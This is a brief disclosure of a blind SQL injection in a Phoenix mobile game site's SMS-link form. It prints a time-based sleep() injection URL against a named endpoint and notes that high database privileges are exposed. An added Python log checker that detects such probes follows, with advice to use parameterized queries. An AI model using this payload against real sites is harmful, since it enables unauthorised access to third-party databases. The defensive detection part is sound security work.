Brief description:
The Phoenix mobile game site (凤凰手机游戏网) has a blind SQL injection vulnerability in the form where a phone number is entered to send a push link.
Detailed description:
URL with the blind SQL injection:
fenghuang/game/game_send_sms.jsp?gameid=130221346000%27%20and%20sleep%282%29%3d%27&mo=
http://www.myhack58.com/Article/UploadPic/2013-4/2013411254849748.png
http://www.myhack58.com/Article/UploadPic/2013-4/20134112545369314.png
http://www.myhack58.com/Article/UploadPic/2013-4/20134112565766695.jpg
The mysql system database is visible, so it looks like the user's privileges must be quite high.
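
Added example (not part of the original report): a log check for this endpoint that decodes the query string and flags non-numeric parameter values and time-delay function calls such as the one in the URL above. It assumes that `gameid` and `mo` are purely numeric in legitimate traffic; the request lines are constructed, and only the query string of the second one comes from the report.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed request lines; the second carries the query string from the report.
SAMPLE_REQUESTS = [
    "GET /fenghuang/game/game_send_sms.jsp?gameid=130221346000&mo=13800000000 HTTP/1.1",
    "GET /fenghuang/game/game_send_sms.jsp"
    "?gameid=130221346000%27%20and%20sleep%282%29%3d%27&mo= HTTP/1.1",
    "GET /fenghuang/game/game_send_sms.jsp?gameid=130221346000&mo=abc HTTP/1.1",
]

# Assumption: both parameters are purely numeric in legitimate traffic.
NUMERIC_PARAMS = {
    "gameid": re.compile(r"\d{1,20}"),
    "mo": re.compile(r"\d{0,15}"),
}
# MySQL time-delay functions commonly seen in time-based blind injection probes.
DELAY_CALL = re.compile(r"\b(sleep|benchmark)\s*\(", re.IGNORECASE)


def inspect_request(request_line):
    """Return a list of findings for one request line (empty list means clean)."""
    parts = request_line.split(" ")
    if len(parts) < 2:
        return ["malformed request line"]
    # parse_qs percent-decodes values, so %27 and %28 are seen as ' and (.
    params = parse_qs(urlsplit(parts[1]).query, keep_blank_values=True)
    findings = []
    for name, values in params.items():
        for value in values:
            pattern = NUMERIC_PARAMS.get(name)
            if pattern and not pattern.fullmatch(value):
                findings.append(f"{name}: non-numeric value {value!r}")
            if DELAY_CALL.search(value):
                findings.append(f"{name}: time-delay function call")
    return findings


def scan(request_lines):
    """Map each suspicious request line to its findings."""
    flagged = {}
    for line in request_lines:
        findings = inspect_request(line)
        if findings:
            flagged[line] = findings
    return flagged


if __name__ == "__main__":
    for line, findings in scan(SAMPLE_REQUESTS).items():
        print(line, findings, sep="\n  ")
```

The same allow-list belongs in the JSP handler itself, together with a parameterized query, so that a non-numeric `gameid` is rejected before it reaches the database.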